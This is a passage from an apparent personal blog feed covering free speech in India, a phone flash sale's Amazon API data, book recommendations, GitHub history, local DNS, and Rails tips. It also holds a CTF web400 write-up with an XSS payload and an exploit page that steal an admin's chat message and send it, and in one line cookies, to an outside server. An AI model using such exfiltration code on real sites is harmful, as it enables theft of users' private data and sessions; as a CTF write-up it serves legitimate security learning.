Hussain to a private collector, but was named <em>Bharat Mata</em> later when it was sold in an auction.</p> <p>Were you offended by looking at it? Maybe. Does it look vulgar and offensive to you? Perhaps. What should you do as a result?</p> <p>CLOSE THE TAB!</p> <p>Seriously, India. 
The right thing to do when you are offended is not to <a href="http://indianexpress.com/article/india/politics/muslim-techie-beaten-to-death-in-pune-7-men-of-hindu-outfit-held/"><em>lynch a person to death</em></a>, or to <a href="http://timesofindia.indiatimes.com/india/Fatwa-issued-against-Vande-Mataram/articleshow/5191847.cms">issue a fatwa against singing the national song</a>. The right thing to do is this:</p> <p><img src="https://boardgametime.files.wordpress.com/2012/04/table_flip.jpg" alt="Flip the table" /></p> <p>The right to get offended in India is a result of the way our constitution curbs the freedom of speech. However, these restrictions were not in the constitution that was passed when India was made a republic (26 Jan 1950). It was added as the First Amendment (ironic, I know), which passed in June 1951.</p> <p>In the 18 months that passed between these two events, Indians had the right to absolute freedom of speech. I won’t go into the details of why both Nehru and Patel thought of bringing these restrictions (for the better of India), but needless to say, the reasons are no longer valid.</p> <p>However, I found a curious piece of irony while researching this:</p> <p>One of the prime opponents to the First Amendment restrictions was <a href="http://www.wikiwand.com/en/Syama_Prasad_Mukherjee">Syama Prasad Mookerjee</a>, a long time RSS activist, founder of the Bharatiya Jana Sangh and widely regarded as the <a href="http://www.shyamaprasad.org/home.html">godfather of Hindu Nationalism</a>.</p> <p>And now today, 64 years later, these restrictions are getting enacted into even more draconian laws. One such law is Section 66A of the Information Technology Act.</p> <p>Kapil Sibal, former union minister <a href="http://indiatoday.intoday.in/story/freedom-internet-online-charlie-hebdo-kapil-sibal/1/416011.html">writes about it</a>:</p> <blockquote> <p>Allowing the government to regulate the internet is a recipe for disaster. 
Government being what it is, it would use such power to further its own ends.</p> </blockquote> <p>However, he gives in to the diplomatic reasoning and writes further:</p> <blockquote> <p>I know where I stand. I am for freedom of expression, but there are no absolutes in life. Limitless freedom contains within it the seeds of conflict. We must eschew conflict and embrace freedom, for peace and harmony.</p> </blockquote> <p>Note that back in 2012, Kapil Sibal had spoken <a href="http://tech.firstpost.com/news-analysis/dear-sibal-here-is-why-section-66a-does-not-protect-women-212326.html">in favor of Section 66A</a>, citing it as a tool to protect women online. He seems to have reversed his stance since.</p> <p>This is what Tushar Mehta, Additional Solicitor General has to say on the necessity of the act:</p> <blockquote> <p>[…] every institution and every person right from the President can be subjected to criticism and it is people’s fundamental right to free speech and expression but such rights do not cover grossly offensive comments and posts on social networking sites.</p> </blockquote> <p>AIB recently tested their rights by making a grossly offensive video and posting it on social networking sites. A lot of people were offended. The video was taken down as a result.</p> <p>Did the people who were offended see the video? Yes, probably on YouTube. But the recordings are still floating around, and are available on torrents very easily.</p> <p>You see, the internet is a resilient beast. You can’t control it, or bend it to your will. It does not run by your rules, and your sense of sensibility. It has no concept of right or wrong. It just is.</p> <p>A nation where I am afraid to post critical views of the government or discuss events that might offend someone is not a nation worth living in.</p> <p>The internet cannot be regulated. 
You might certainly think of it as possible, but <a href="https://www.eff.org/" title="Electronic Frontier Foundation">we</a> <a href="https://wikileaks.org/" title="Wikileaks">will</a> <a href="https://www.torproject.org/" title="The Tor Project">always</a> <a href="https://thepiratebay.org/" title="The Pirate Bay">find</a> a way.</p> <blockquote> <p>If you are offended it is your problem, and frankly lots of things offend lots of people. - <a href="http://www.goodreads.com/quotes/739464-nobody-has-the-right-to-not-be-offended-that-right">Salman Rushdie</a></p> </blockquote> <p>I don’t think I will ever see the first amendment repealed in my lifetime. However, I’m gonna try my very best to get the Supreme Court to re-evaluate Section 66A as unconstitutional and over-reaching.</p> <p>If you want to let the government know of your thoughts on the matter, the Assistant Solicitor General (representing the Government in the case) can be reached at <a href="mailto:[email protected]">[email protected]</a>.</p> <h2 id="further-reading">Further Reading</h2> <p>This is a loose list of various references and readings on the topic.</p> <ul> <li><a href="http://vimeo.com/92778395">A Story of Censorship: How the Right to Take Offense is Shrinking Free Speech in India</a> - A video seminar on the topic by Anuradha Raman, Outlook Magazine</li> <li><a href="https://en.wikipedia.org/wiki/First_Amendment_of_the_Constitution_of_India">First Amendment</a> of the Constitution of India</li> <li><a href="http://scroll.in/article/700020/Why-Nehru-and-Sardar-Patel-curbed-freedom-of-expression-in-India">Why Nehru and Sardar Patel curbed freedom of expression in India</a> - A nice summary of the events that lead to the passing of the First Amendment</li> <li><a href="http://timesofindia.indiatimes.com/india/Bharat-Mata-a-work-of-art-SC/articleshow/3459623.cms">Bharat Mata a work of art</a> - A ruling by the Supreme Court declaring the topmost image in this post as a work of art, and that 
<em>no one gets scandalized looking at art</em>.</li> <li><a href="http://www.wikiwand.com/en/Freedom_of_expression_in_India">Restrictions on freedom of speech in India</a></li> <li><a href="http://www.livemint.com/Opinion/hZBwopyF7MD10C8QHODZEN/Of-writers-and-poets-who-criticize-with-their-pens.html">An excellent piece on abolishing the restrictions on free speech</a> titled <em>Of writers and poets who criticize with their pens</em> (Rajeev Mantri)</li> <li>A few pieces on the ongoing panel: <a href="http://indiatoday.intoday.in/story/objectionable-social-media-posts-cyberspace-modi-government-supreme-court-facebook-twitter-freedom-of-expression/1/416800.html">India Today</a>, <a href="http://indianexpress.com/article/india/india-others/sc-on-it-act-will-examine-section-66a-as-it-stands/">Indian Express</a>, <a href="http://www.firstpost.com/living/who-defines-grossly-offensive-sc-raises-red-flags-over-draconian-sec-66a-of-it-act-2079081.html">Firstpost’s Summary</a></li> </ul> <hr /> <p>Thanks to <a href="https://shashankmehta.in/">Shashank Mehta</a> and <a href="https://rkravi.com/">Ravi Kishore</a> for reviewing drafts of this.</p> Are you a fighter pilot? 2015-01-28T00:00:00+00:00 https://captnemo.in/blog/2015/01/28/are-you-a-fighter-pilot <p>As part of a pre job interview for a position as a security consultant, I was asked this question. The interviewer expanded the question further as:</p> <blockquote> <p>Given the choice between a luxurious journey in a passenger jetliner (flying business class) and a thrilling trip as a fighter pilot, which one would you choose?</p> </blockquote> <p>My immediate reply was (without a single doubt): “I’ll take the fighter jet, thanks.”</p> <p>Then the interviewer tried to dissuade me from my choice: “It’s not as glamorous as it sounds. It’s a terrible job flying a jet plane. There are lots of complications, you are literally defying death, and even the pay isn’t that good.” 
He then spent quite some time explaining the luxuries and comforts that we take for granted in a passenger jet, and those that aren’t available in a fighter jet. “You can’t even piss properly”, he told me. “And there’s free booze on the Boeing.”</p> <p>Me (after some deliberation and moment of self-doubt): I’d ultimately like to have my own private jet, but I’m willing to strap myself to a 300 million dollar plane just trying to get there. I’d take that over a passenger jet any day.</p> <p>For those who didn’t get the analogy: He was trying to convince me to join a high risk job, where I’d be working late nights doing what I love. But it also means giving up tons of luxuries and comforts that I could get at other companies.</p> <p>I’m sure that I’m the fighter jet kind of person, I’m just having difficulty deciding what jet I wanna fly. If you have an opening for a Full Stack Developer/Security Consultant, shoot me a mail.</p> Yu were mislead 2015-01-13T00:00:00+00:00 https://captnemo.in/blog/2015/01/13/yu-yureka <p>I was eagerly awaiting the release of Yu Yureka, which has been widely hailed as a great budget phone by most reviews. I won’t go into the details of the phone, but rather the flash sale that took place on 13th Jan ‘15 (on amazon.in). Far from being a well-managed affair, the website was plagued with issues, and went down for everyone a couple of minutes before the sale.</p> <p>Still, a few lucky people were able to buy the phone (sadly, I wasn’t one of them). Micromax said that they had to close registrations for the sale early and had around 3 lakh people lined up for the sale.</p> <p>This is how the <a href="https://web.archive.org/web/20150122020319/http://yuplaygod.com/">yuplaygod.com</a> homepage looks right now:</p> <p><img src="/img/yuplaygod.jpg" alt="YuPlayGod.com Home Page" /></p> <p>Clearly, they had 10k units for sale, and one in every 300 people should have bought it, right? 
Wrong!</p> <p>It seems Yu (the brand new subsidiary of Micromax) is not above lying. There were <em>only 3000 devices on sale today, out of which only 2657 were claimed</em>, after which the sale was shut down.</p> <p>How do I know this? The way deals work on amazon is once you are on a deal page, the client keeps checking the deal status every few seconds so as to let you know as soon as its status changes. This deal status response does not only include the deal status code (say EXPIRED/SOLDOUT/AVAILABLE), but also includes the deal’s nitty details.</p> <p>These details include:</p> <ul> <li>totalCouponCount: <strong>3000</strong></li> <li>claimedCouponCount: <strong>2657</strong></li> <li>percentClaimed: <strong>88</strong></li> <li>type: <code class="language-plaintext highlighter-rouge">LIGHTNING_DEAL</code></li> <li>title: Yureka</li> <li>dealPrice: 8999</li> <li>currentPrice: 12999</li> </ul> <p>I’m not sure why Yu would try such a tactic (hype the device at low cost, overstate sales figures and then switch to a higher price), but it sure does not sound nice if you are one of the 3 lakh people who lined up to buy the device.</p> <h2 id="references">References</h2> <p>Since it’s my word against amazon, here’s a simple way to confirm the deal details for yourself:</p> <ol> <li>Visit <a href="http://hurl.it/">http://hurl.it/</a> (I don’t own this site)</li> <li>Change the request method to “POST” from “GET”</li> <li>Enter <code class="language-plaintext highlighter-rouge">http://www.amazon.in/xa/dealcontent/v2/GetDealStatus</code> where it says <code class="language-plaintext highlighter-rouge">yourapihere.com</code></li> <li>Click on “+ Add Body Button”</li> <li>Paste <code class="language-plaintext highlighter-rouge">{"requestMetadata":{"marketplaceID":"A21TJRUUN4KGV","clientID":"goldbox"},"dealTargets":[{"dealID":"ea9fef51","itemIDs":null}]}</code> into the box that appears</li> <li>Click on “Launch Request”</li> <li>Scroll to the bottom to see the 
dealStatus</li> </ol> <p>As an alternative, <a href="https://gist.github.com/captn3m0/52fca6662e453c60a6b9">here is a permalink</a> to the request.</p> <p><strong>Update</strong>: If you try to replicate the above steps, you will notice that the deal response is now blank. My guess is that the deal was deleted from the servers. However, the permalinks above should still work. I’m still waiting for any official word from either Yu/Amazon.</p> <p>Here’s a better (edited) photo that Yu might wanna use:</p> <p><img src="/img/yuplaygod_edited.jpg" alt="Yu don't play God" /></p> <p>Thanks to <a href="http://shashankmehta.in/">Shashank Mehta</a> for the title suggestion.</p> Thank You Pat 2015-01-03T00:00:00+00:00 https://captnemo.in/blog/2015/01/03/thank-you-pat <p>I’m a lazy reader. I’ll often start books and leave them halfway, often juggling 3-4 books at the same time. I read in sprints, often spending a few days just finishing lots of books followed by reading nothing for the next few weeks, perhaps. But that doesn’t mean I don’t appreciate good books. This is the story of how I found my favorite writer, and how I discovered the wonderful books that I enjoy so deeply.</p> <p>I don’t write a journal regularly, but if I did, one of my favorite things to do with it is to figure out the little things that matter; to separate out the strands and understand the connections and the motivations behind where I am today</p> <blockquote> <p>It is our choices…that show what we truly are, far more than our abilities.</p> <ul> <li>Albus Dumbledore</li> </ul> </blockquote> <p>What I love to do is figure out those tiny choices, and the <em>reasoning</em> behind them that led me to today.</p> <p>I read Patrick Rothfuss’s <a href="https://www.goodreads.com/book/show/186074.The_Name_of_the_Wind" title="The Name of the Wind, by Patrick Rothfuss">“Name of the Wind”</a> a long time back. 
It was an amazing book, which I found on a site called <a href="http://bestfantasybooks.com/">bestfantasybooks.com</a>. In my defense, I was an avid Harry Potter fan at the time, looking for similar books, and I’d decided that reading the best fantasy would be good preparation before I could write my own.</p> <p>As it so happens, “Name of the Wind” was a superb book. The kind that made me squirm in delight when I saw that the sequel was already out. So I did what any self-respecting book-lover would do: read it in a single stretch, screwing up my exams in the process. I didn’t sleep much for those few days (its a pretty long book), but I enjoyed every bit of it.</p> <p>I started following Pat’s (hilarious) <a href="http://blog.patrickrothfuss.com/" title="Pat's blog">blog</a>, where he often posted tidbits of his life, and came across <a href="https://www.goodreads.com/review/show/315662446" title="Patrick's review of The Alloy of Law">his review</a> of “The Alloy of Law” by Brandon Sanderson:</p> <blockquote> <p>…<br /> My last point is that Sanderson has now been added to a very short list of authors. Specifically, the list authors whom I wish to kill so that I might eat their livers and thereby gain their power.</p> </blockquote> <p>Any author that Patrick wanted to kill sounded like a great one to read, so I started “The Alloy of Law”. I finished the book in a few short hours. Its paced excellently, and the action keeps on coming. I’d never really read much urban fantasy before, and despite me never having read Mistborn (Alloy is a sequel to the Mistborn trilogy) I was sucked in.</p> <p>And here I am, counting down the next few days, waiting for the release of <a href="https://www.goodreads.com/book/show/15704459.Firefight" title="Firefight, by Brandon Sanderson">Firefight</a>, Sanderson’s next book.</p> <p>So, thank you Pat. Thanks for introducing me to my favorite writer. 
Thank you for writing those wonderful books, and keep on reviewing all that you love (I’m reading <a href="https://www.goodreads.com/book/show/18659623-through-the-woods" title="Through the Woods, by Emily Carroll">“Through the Woods”</a> next).</p> <p>If you are looking for a nice fat book to read next, I heartily recommend <a href="https://www.goodreads.com/book/show/186074.The_Name_of_the_Wind" title="The Name of the Wind, by Patrick Rothfuss">“The Name of the Wind”</a> and <a href="https://www.goodreads.com/book/show/7235533-the-way-of-kings" title="Way of Kings, by Brandon Sanderson">“The Way of Kings”</a>.</p> ECTF-14 Web400 Writeup 2014-10-20T00:00:00+00:00 https://captnemo.in/blog/2014/10/20/ectf-web400-writeup <p>We recently participated in <a href="https://github.com/ctfs/write-ups-2014/tree/master/ectf-2014">ECTF-14</a> and it was a great experience. Here’s a writeup to the web400 challenge:</p> <h3 id="problem-statement">Problem Statement</h3> <blockquote> <p>The chat feature was added to Facelook website and to test it, founder of the company had sent a message in chat to the admin. Admin reads all the chat messages, but does not reply to anyone. Try to get that chat message and earn the bounty. [Annoying Admin]</p> </blockquote> <p>The challenge consisted of a simple signup and a chat message sending feature, where anyone could send a chat message to anyone. However, on the loading side, the chat message was loaded using Javascript. 
The code for loading the messages looked like this:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">function</span> <span class="nx">load_messages</span> <span class="p">(</span><span class="nx">id</span><span class="p">)</span> <span class="p">{</span> <span class="nx">$</span><span class="p">.</span><span class="nx">ajax</span><span class="p">({</span> <span class="na">url</span><span class="p">:</span> <span class="dl">"</span><span class="s2">http://212.71.235.214:4050/chat</span><span class="dl">"</span><span class="p">,</span> <span class="na">data</span><span class="p">:</span> <span class="p">{</span> <span class="na">sender</span><span class="p">:</span> <span class="nx">id</span><span class="p">,</span> <span class="p">},</span> <span class="na">success</span><span class="p">:</span> <span class="kd">function</span><span class="p">(</span> <span class="nx">response</span> <span class="p">)</span> <span class="p">{</span> <span class="nb">eval</span><span class="p">(</span><span class="nx">response</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> <span class="p">}</span> </code></pre></div></div> <p>The url above responded as the following:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$('#chat_234').html('');$('#chat_234').append('dream&lt;br /&gt;'); </code></pre></div></div> <p>Where <code class="language-plaintext highlighter-rouge">dream</code> was the message I sent. My first attempt was to break out of the append function, and execute my own javascript, by trivially using a single quote. 
Unfortunately, the single quote was escaped and removed by the backend.</p> <p>Next, I tried using <code class="language-plaintext highlighter-rouge">&amp;#x27;</code> instead of a single quote, and it worked:</p> <p>Message Sent: <code class="language-plaintext highlighter-rouge">&amp;#x27;+alert(1)+&amp;#x27; </code></p> <p>Message received: <code class="language-plaintext highlighter-rouge">$('#chat_234').html('');$('#chat_234').append('dream&lt;br /&gt;');$('#chat_234').append(''+alert(1)+'&lt;br /&gt;');</code></p> <p>This seemed simple enough to exploit as XSS, so I quickly wrote up my exploit:</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$.get('/chat?sender=2', function(data){ $.post("http://my-server.com/ectf/index.php", {content: data}); }); </code></pre></div></div> <p>This utilized the fact that we knew Founder’s user id to be <code class="language-plaintext highlighter-rouge">2</code>. The code worked perfectly fine with my test accounts, but something weird happened when the challenge server (admin) ran it. I would get a <code class="language-plaintext highlighter-rouge">GET</code> request on the above-mentioned URL, instead of a POST. Also, attempting to generate the URL using concat or + or any operator, such as <code class="language-plaintext highlighter-rouge">"http://my-server.com/index.php?data="+document.cookie</code>, made a request to <code class="language-plaintext highlighter-rouge">http://my-server.com/index.php?data=</code>. Anything I appended was just ignored, plain and simple.</p> <p>After attempting to get a POST request with cookie or session data for a long time, I realized that the problem was not XSS, but rather a CSRF attack. This was because the data was being loaded in a Javascript request, instead of JSON. A Javascript request (using a script tag) can be made across domains, which meant that any website could access the data by using the proper script tag. 
We just had to add a script tag with its src set to <code class="language-plaintext highlighter-rouge">http://212.71.235.214:4050/chat?sender=2</code>. This would automatically add the chat message to a div with id <code class="language-plaintext highlighter-rouge">chat_2</code>.</p> <p>The only issue was that Admin had to visit our site, with proper cookies, and we know already that admin has been sniffing for links and visiting them. So I wrote up my second (this time working) exploit:</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html</span> <span class="na">lang=</span><span class="s">"en"</span><span class="nt">&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;meta</span> <span class="na">charset=</span><span class="s">"utf-8"</span><span class="nt">&gt;</span> <span class="nt">&lt;title&gt;</span>ECTF14 web400 exploit<span class="nt">&lt;/title&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"chat_2"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"chat_106"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;script</span> <span class="na">src=</span><span class="s">"http://code.jquery.com/jquery-1.11.0.min.js"</span><span class="nt">&gt;&lt;/script&gt;</span> <span class="nt">&lt;script&gt;</span> $(document).ready(function(){ $.getScript("http://212.71.235.214:4050/chat?sender=2"); setTimeout(function(){ var text = $('#chat_2').text(); $.post('http://20c7d53b.ngrok.com/', {content:text}); }, 1000); }) <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre></div></div> <p>Unfortunately, the exploit did not work on Chrome because Chrome refused to 
run the script as javascript, because it was being served with a mime-type of <code class="language-plaintext highlighter-rouge">text/html</code>. It worked in Firefox, and I crossed my fingers as I sent out the link to the above page to the admin in a chat message. I knew the admin user was using PhantomJS to run my javascript (because of the user-agent in numerous GET requests I got earlier). So, I was hopeful that this would work.</p> <p>I was listening at the URL, and sure enough, as soon as I sent a link out to this page, the admin ran my javascript and I got the flag in a POST request.</p> <p>The flag was <code class="language-plaintext highlighter-rouge">bad_js_is_vulnerable</code>.</p> Living a public life as a privacy advocate 2014-08-14T00:00:00+00:00 https://captnemo.in/blog/2014/08/14/my-public-life <p>If you’ve known me for a while, you might know me as a privacy conscious individual or perhaps as someone who leads a very public life. The truth is that I lead both these lives; and while that may sound oxymoronic to some, it’s perfectly clear to me.</p> <p>I’m a huge privacy advocate. I still remember the day I woke up and read about PRISM first thing in the morning. My reaction was a mix of disbelief, anger, and frustration. In the aftermath of the PRISM reveal, I made a few choices: I would retain ownership of my data, and I’ll do whatever I can to promote tools that help you do this.</p> <p>I’m still working on both fronts, but the reality of the situation is that we are surrounded by walled gardens. I decided to make the best I could of these gardens. I remember reading a weird suggestion: only post public stuff on facebook; and I was somehow convinced to try it out.</p> <p>But I took the experiment a step further. If the service is something I can’t control myself (say self-hosted), everything I do with it should be for public-viewing. 
Since then, I’ve rarely posted anything private on facebook.</p> <p>Other services where I follow the same advice include:</p> <ul> <li><strong><a href="https://goodreads.com/captn3m0" title="My goodreads profile">Goodreads</a></strong> - Whatever I read is public information, along with real-time updates of my reading habits.</li> <li><strong><a href="http://www.last.fm/user/captn3m0" title="My last.fm profile page">Last.FM</a></strong> - All my music tastes, along with real-time updates on what I’m listening to.</li> <li><strong><a href="https://facebook.com/capt.n3m0" title="My facebook profile">Facebook</a></strong> - All of my posts on facebook are public. I do have some private messaging interactions on facebook (I never initiate them) and usually move them to email if they grow important.</li> <li><strong><a href="https://twitter.com/captn3m0" title="My twitter account">Twitter</a></strong> - Tiny byte-sized thoughts and observations are, again, public. My account is set to public, which doesn’t mean that I trust twitter with my data. It just means that I expect my data to be public.</li> <li><strong><a href="https://github.com/captn3m0" title="My github account">GitHub</a></strong> - One of the few companies I trust to keep my data safe. Barring a few exceptions, everything I do on github is public, ready for anyone to analyze and use as public data. In fact, github makes all of its timeline data available to public as a dataset on bigquery.</li> <li><strong><a href="http://share.xmarks.com/folder/bookmarks/Jy4cCyZzZR" title="My Shared public bookmarks">Bookmarks</a></strong> - Most of my bookmarks are public via xmarks. 
I haven’t synced it in a while since XMarks and Chrome Sync don’t work well together, but plan to do something about this as well.</li> </ul> <p>Along with all this, most of the writing I do these days is for public consumption, either via my Blog, or some platform like <a href="https://www.quora.com/Abhay-Rana" title="My Quora profile">Quora</a>, StackExchange, or Medium.</p> <h2 id="why">Why</h2> <p>My reasoning behind keeping all of my online life public is twofold:</p> <ol> <li>This creates a public archive of my life, accessible to everyone.</li> <li>It doesn’t give me an illusion of privacy when there is none.</li> </ol> <p>In reference to (1) above, I recently set up Google Inactive Accounts, and have to commend Google on the execution of the concept. Be sure to check it out at <a href="https://www.google.com/settings/account/inactive">https://www.google.com/settings/account/inactive</a>.</p> <h2 id="disadvantages">Disadvantages</h2> <p>This lifestyle choice is not without its drawbacks. Stalking me, for example, is very easy. Impersonating me is probably easy as well. However, these are risks I’m willing to take in order to lead a public life.</p> <h2 id="exceptions">Exceptions</h2> <p>By now you might be thinking of me as a pro-facebook share-everything kind of guy. But that’s not completely true. I do have clear limits on what counts as public and what does not. I value my privacy (and that of those close to me) very dearly.</p> <p>For instance, I count my photographs as something very private. I almost never post public updates anywhere with my picture in it. Perhaps it’s because I never had a phone with a decent camera. Whatever the reason, I try really hard to keep my pictures off the internet.</p> <p>Another related issue is when the update would involve someone besides me. 
For example, my sister was recently engaged and I didn’t go on a social update spree telling the whole world about it, because I value her privacy.</p> <p>My simple rule of thumb is to ask for permission, rather than beg for forgiveness as a person’s privacy is far more important.</p> What was the first project on GitHub? 2014-08-02T00:00:00+00:00 https://captnemo.in/blog/2014/08/02/first-project-on-github <p><strong>Note</strong>: This is cross-posted from <a href="https://qr.ae/CW76f">Quora</a> where I wrote this answer initially.</p> <p>The first project on GitHub was <strong>grit</strong>. How do I know this? Just some clever use of the search and API.</p> <p><a href="https://github.com/search?q=created%3A%3C2008-01-15&amp;type=Repositories&amp;ref=searchresults">Here’s a GitHub search</a> to see the first 10 projects that were created on GitHub. The search uses the <code class="language-plaintext highlighter-rouge">created</code> keyword, and searches for projects created before 15 Jan 2008.</p> <p>They are (in order of creation) (numeric id of repo in brackets):</p> <ol> <li><a href="https://github.com/mojombo/grit">mojombo/grit</a> (1) <blockquote> <p>Grit gives you object oriented read/write access to Git repositories via Ruby. Deprecated in favor of libgit2/rugged</p> </blockquote> </li> <li><a href="https://github.com/wycats/merb-core">wycats/merb-core</a> (26) <blockquote> <p>Merb Core: All you need. None you don’t. Merb was an early ruby framework that was merged to Rails No longer maintained.</p> </blockquote> </li> <li><a href="https://github.com/rubinius/rubinius">rubinius/rubinius</a> (27) <blockquote> <p>Rubinius, the Ruby Environment Still under active development</p> </blockquote> </li> <li><a href="https://github.com/mojombo/god">mojombo/god</a> (28) <blockquote> <p>God is an easy to configure, easy to extend monitoring framework written in Ruby. 
Still actively maintained, and used by GitHub internally as well, I think.</p> </blockquote> </li> <li><a href="https://github.com/vanpelt/jsawesome">vanpelt/jsawesome</a> (29) <blockquote> <p>JSAwesome provides a powerful JSON based DSL for creating interactive forms. Its last update was in 2008.</p> </blockquote> </li> <li><a href="https://github.com/wycats/jspec">wycats/jspec</a> (31) <blockquote> <p>A JavaScript BDD Testing Library. No longer maintained.</p> </blockquote> </li> <li><a href="https://github.com/defunkt/exception_logger">defunkt/exception_logger</a> (35) <blockquote> <p>The Exception Logger logs your Rails exceptions in the database and provides a funky web interface to manage them. No longer maintained.</p> </blockquote> </li> <li><a href="https://github.com/defunkt/ambition">defunkt/ambition</a> (36)</li> <li><a href="https://github.com/technoweenie/restful-authentication">technoweenie/restful-authentication</a> (42) <blockquote> <p>Generates common user authentication code for Rails/Merb, with a full test/unit and rspec suite and optional Acts as State Machine support built-in. Maintained till Aug 2011.</p> </blockquote> </li> <li><a href="https://github.com/technoweenie/attachment_fu">technoweenie/attachment_fu</a> (43) <blockquote> <p>Treat an ActiveRecord model as a file attachment, storing its patch, size, content type, etc.</p> </blockquote> </li> </ol> <p>I’m sure the ids from 2-25 would be taken up by many of the internal GitHub projects, such as github/github. To get the numeric id of a repo, visit <a href="https://api.github.com/repos/mojombo/grit">https://api.github.com/repos/mojombo/grit</a> and change the URL accordingly.</p> How does the sdslabs.co.in domain name work? 2014-07-27T00:00:00+00:00 https://captnemo.in/blog/2014/07/27/how-does-sdslabs-co-in-work <p>A very commonly asked question is about our domain name and how it works locally. 
When we launched <a href="https://blog.sdslabs.co/2010/11/hello-world">filepanda, and our preliminary homepage</a> a long time ago, we had been using the easy to remember IP address <a href="http://192.168.208.208">http://192.168.208.208</a>.</p> <p>Now, however we are using the domain name sdslabs.co.in for all our services, including <a href="http://dc.sdslabs.co.in">DC</a>. To understand how this works, you will have to understand how the name resolution of a domain name takes place.</p> <blockquote> <p>The Domain Name System (DNS) is a hierarchical distributed naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participating entities.</p> <p>- <a href="http://en.wikipedia.org/wiki/Domain_Name_System">Wikipedia</a></p> </blockquote> <p>DNS is basically a service which resolves domain names to IP addresses. If you own a domain name, you can point it to wherever you want. This is usually done in the administration panel of your hosting services. We have setup multiple domains on our nameserver (<a href="http://mitsu.in">mitsu.in</a> as of the moment) to point to the IP address 192.168.208.x.</p> <p>For instance <a href="http://sdslabs.co.in">sdslabs.co.in</a> points to <code class="language-plaintext highlighter-rouge">192.168.208.208</code>, <a href="http://echo.sdslabs.co.in">echo.sdslabs.co.in</a> points to <code class="language-plaintext highlighter-rouge">192.168.208.204</code> and so on. 
This is done by updating something called <code class="language-plaintext highlighter-rouge">A records</code> (this is the part of resolution which translates to IPv4 addresses).</p> <p>The benefits of having such a system in place are enormous:</p> <ul> <li>Users don’t have to remember IP addresses, and can easily remember the site address.</li> <li>We can move services and applications around over different machines, and it will only take a single update to change the name resolutions.</li> <li>We could add alternative fallback servers easily (by having multiple A record entries) for a domain. We could even use this to point the sdslabs.co.in domain to something that is hosted online, for instance.</li> <li>We can have catchy and simple-to-remember URLs, e.g. <a href="https://sdslabs.co.in/login">https://sdslabs.co.in/login</a> and <a href="https://sdslabs.co.in/logout">https://sdslabs.co.in/logout</a>.</li> </ul> <p>Also, we are running all our services on https, which <em>is not dependent upon the visibility of the website</em>. Even though the site is hosted locally, the process of certificate signing remains exactly the same as any other site. Once we acquire an SSL certificate and attach it to our web-server, the visibility of the domain does not matter to the browser at all.</p> <p>Note: For the benefit of those not in IIT Roorkee, we are running multiple web services on the domain sdslabs.co.in, which is only served locally, as it resolves to a local IP address (192.168.208.208).</p> <p><strong>Caveat</strong>: Several DNS servers will block RFC1918 responses by default (basically any DNS response in the private IP ranges). 
This blocking is usually disabled in intranet scenarios, but it is something to keep in mind if you’re looking to use this solution.</p> Coming back to rails 2014-07-11T00:00:00+00:00 https://captnemo.in/blog/2014/07/11/back-to-rails <p>I’ve <a href="/blog/2011/08/01/learning-ruby-on-rails/">worked with rails before</a>, but that was a long time back and even though I’ve continued to dabble with it, I’d never built anything complete or large enough with it. This time, however, I’m working on an actual large-scale application with all the nuts-and-bolts that make rails such a pleasure to work with. Since I’m coming back to rails after such a long time, I thought I’d document some of the cool new features that I’ve found in rails this time around.</p> <h2 id="spring">Spring</h2> <p>One of the major discomforts of working with rails on the command line was that it is <em>heavy</em> and <em>slow</em>. Spring works behind the scenes on the second issue, namely speed. Here’s how the project’s README describes itself:</p> <blockquote> <p>Spring is a Rails application preloader. 
It speeds up development by keeping your application running in the background so you don’t need to boot it every time you run a test, rake task or migration.</p> </blockquote> <p>You can update all the binaries in your <code class="language-plaintext highlighter-rouge">PROJECT_ROOT/bin/</code> directory (which include <code class="language-plaintext highlighter-rouge">rails</code>, <code class="language-plaintext highlighter-rouge">bundle</code> and <code class="language-plaintext highlighter-rouge">rake</code>) to make use of spring by executing the following command:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bundle exec spring binstub --all </code></pre></div></div> <p>Any further execs (such as <code class="language-plaintext highlighter-rouge">./bin/rake -T</code>) will make use of the spring pre-loader leading to much faster startup times. You can even use spring against the default system binaries by prefixing the commands with <code class="language-plaintext highlighter-rouge">spring</code>, such as <code class="language-plaintext highlighter-rouge">spring rake -T</code>.</p> <h2 id="resque-scheduler">Resque-Scheduler</h2> <p>I needed a job queue for background tasks and polling API services, and what better tool to use than resque. I’m using it in combination with <a href="https://github.com/resque/resque-scheduler">resque-scheduler</a> for running tasks on cron. 
How it works is that in addition to your main rails server and a long running resque job process, a separate resque-scheduler rake task is kept running, which loads up the schedule and inserts tasks accordingly into the resque queue as per the schedule.</p> <p>For those new to resque in general, you can start the two processes by:</p> <figure class="highlight"><pre><code class="language-sh" data-lang="sh"><span class="nv">QUEUE</span><span class="o">=</span><span class="k">*</span> rake environment resque:work <span class="c">#To start resque</span> rake resque:scheduler</code></pre></figure> <p>Note that we are pre-loading the rails environment in the resque:work task as it will load rails for you across all of your tasks. Also note that you will need the following two lines in your <code class="language-plaintext highlighter-rouge">Rakefile</code> to get these tasks to run:</p> <figure class="highlight"><pre><code class="language-ruby" data-lang="ruby"><span class="nb">require</span> <span class="s1">'resque/tasks'</span> <span class="nb">require</span> <span class="s1">'resque/scheduler/tasks'</span></code></pre></figure> <p>Also remember to define the <code class="language-plaintext highlighter-rouge">resque:setup</code> task according to the <code class="language-plaintext highlighter-rouge">resque-scheduler</code> README, which would load the schedule and config as needed.</p> <p>This blog post is a work-in-progress and I will continue to update it with bits of rails-foo as I learn more.</p> <h2 id="rake-notes">Rake-notes</h2> <p>I’d never tried using notes before, and as it turns out, using 